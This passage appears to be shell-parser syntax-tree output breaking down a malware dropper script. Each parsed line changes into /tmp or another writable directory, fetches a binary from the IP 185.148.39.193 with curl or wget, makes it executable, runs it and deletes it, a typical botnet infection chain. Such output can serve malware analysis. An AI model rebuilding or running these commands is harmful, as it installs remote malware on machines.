    WordNode(lineno=12, pos=(2888, 2942), word='http://185.148.39.193/lkjghsdfkljgfhm68klksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(2942, 2943)),
  CommandNode(lineno=12, pos=(2944, 2985), parts=[
    WordNode(lineno=12, pos=(2944, 2949), word='chmod'),
    WordNode(lineno=12, pos=(2950, 2952), word='+x'),
    WordNode(lineno=12, pos=(2953, 2985), word='lkjghsdfkljgfhm68klksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(2985, 2986)),
  CommandNode(lineno=12, pos=(2987, 3021), parts=[
    WordNode(lineno=12, pos=(2987, 3021), word='./lkjghsdfkljgfhm68klksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(3021, 3022)),
  CommandNode(lineno=12, pos=(3023, 3062), parts=[
    WordNode(lineno=12, pos=(3023, 3025), word='rm'),
    WordNode(lineno=12, pos=(3026, 3029), word='-rf'),
    WordNode(lineno=12, pos=(3030, 3062), word='lkjghsdfkljgfhm68klksdhjfklsjdhf'),
  ]),
])
ListNode(lineno=13, pos=(3063, 3283), parts=[
  CommandNode(lineno=13, pos=(3063, 3070), parts=[
    WordNode(lineno=13, pos=(3063, 3065), word='cd'),
    WordNode(lineno=13, pos=(3066, 3070), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(3071, 3073)),
  CommandNode(lineno=13, pos=(3074, 3085), parts=[
    WordNode(lineno=13, pos=(3074, 3076), word='cd'),
    WordNode(lineno=13, pos=(3077, 3085), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(3086, 3088)),
  CommandNode(lineno=13, pos=(3089, 3096), parts=[
    WordNode(lineno=13, pos=(3089, 3091), word='cd'),
    WordNode(lineno=13, pos=(3092, 3096), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(3097, 3099)),
  CommandNode(lineno=13, pos=(3100, 3108), parts=[
    WordNode(lineno=13, pos=(3100, 3102), word='cd'),
    WordNode(lineno=13, pos=(3103, 3108), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(3109, 3111)),
  CommandNode(lineno=13, pos=(3112, 3116), parts=[
    WordNode(lineno=13, pos=(3112, 3114), word='cd'),
    WordNode(lineno=13, pos=(3115, 3116), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(3116, 3117)),
  CommandNode(lineno=13, pos=(3118, 3164), parts=[
    WordNode(lineno=13, pos=(3118, 3122), word='curl'),
    WordNode(lineno=13, pos=(3123, 3125), word='-O'),
    WordNode(lineno=13, pos=(3126, 3164), word='http://185.148.39.193/DOESNTEXISTLELEL'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(3165, 3167)),
  CommandNode(lineno=13, pos=(3168, 3211), parts=[
    WordNode(lineno=13, pos=(3168, 3172), word='wget'),
    WordNode(lineno=13, pos=(3173, 3211), word='http://185.148.39.193/DOESNTEXISTLELEL'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(3211, 3212)),
  CommandNode(lineno=13, pos=(3213, 3238), parts=[
    WordNode(lineno=13, pos=(3213, 3218), word='chmod'),
    WordNode(lineno=13, pos=(3219, 3221), word='+x'),
    WordNode(lineno=13, pos=(3222, 3238), word='DOESNTEXISTLELEL'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(3238, 3239)),
  CommandNode(lineno=13, pos=(3240, 3258), parts=[
    WordNode(lineno=13, pos=(3240, 3258), word='./DOESNTEXISTLELEL'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(3258, 3259)),
  CommandNode(lineno=13, pos=(3260, 3283), parts=[
    WordNode(lineno=13, pos=(3260, 3262), word='rm'),
    WordNode(lineno=13, pos=(3263, 3266), word='-rf'),
    WordNode(lineno=13, pos=(3267, 3283), word='DOESNTEXISTLELEL'),
  ]),
])
ListNode(lineno=14, pos=(3284, 3584), parts=[
  CommandNode(lineno=14, pos=(3284, 3291), parts=[
    WordNode(lineno=14, pos=(3284, 3286), word='cd'),
    WordNode(lineno=14, pos=(3287, 3291), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(3292, 3294)),
  CommandNode(lineno=14, pos=(3295, 3306), parts=[
    WordNode(lineno=14, pos=(3295, 3297), word='cd'),
    WordNode(lineno=14, pos=(3298, 3306), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(3307, 3309)),
  CommandNode(lineno=14, pos=(3310, 3317), parts=[
    WordNode(lineno=14, pos=(3310, 3312), word='cd'),
    WordNode(lineno=14, pos=(3313, 3317), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(3318, 3320)),
  CommandNode(lineno=14, pos=(3321, 3329), parts=[
    WordNode(lineno=14, pos=(3321, 3323), word='cd'),
    WordNode(lineno=14, pos=(3324, 3329), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(3330, 3332)),
  CommandNode(lineno=14, pos=(3333, 3337), parts=[
    WordNode(lineno=14, pos=(3333, 3335), word='cd'),
    WordNode(lineno=14, pos=(3336, 3337), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(3337, 3338)),
  CommandNode(lineno=14, pos=(3339, 3401), parts=[
    WordNode(lineno=14, pos=(3339, 3343), word='curl'),
    WordNode(lineno=14, pos=(3344, 3346), word='-O'),
    WordNode(lineno=14, pos=(3347, 3401), word='http://185.148.39.193/lkjghsdfkljgfhm68klksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(3402, 3404)),
  CommandNode(lineno=14, pos=(3405, 3464), parts=[
    WordNode(lineno=14, pos=(3405, 3409), word='wget'),
    WordNode(lineno=14, pos=(3410, 3464), word='http://185.148.39.193/lkjghsdfkljgfhm68klksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(3464, 3465)),
  CommandNode(lineno=14, pos=(3466, 3507), parts=[
    WordNode(lineno=14, pos=(3466, 3471), word='chmod'),
    WordNode(lineno=14, pos=(3472, 3474), word='+x'),
    WordNode(lineno=14, pos=(3475, 3507), word='lkjghsdfkljgfhm68klksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(3507, 3508)),
  CommandNode(lineno=14, pos=(3509, 3543), parts=[
    WordNode(lineno=14, pos=(3509, 3543), word='./lkjghsdfkljgfhm68klksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(3543, 3544)),
  CommandNode(lineno=14, pos=(3545, 3584), parts=[
    WordNode(lineno=14, pos=(3545, 3547), word='rm'),
    WordNode(lineno=14, pos=(3548, 3551), word='-rf'),
    WordNode(lineno=14, pos=(3552, 3584), word='lkjghsdfkljgfhm68klksdhjfklsjdhf'),
  ]),
])
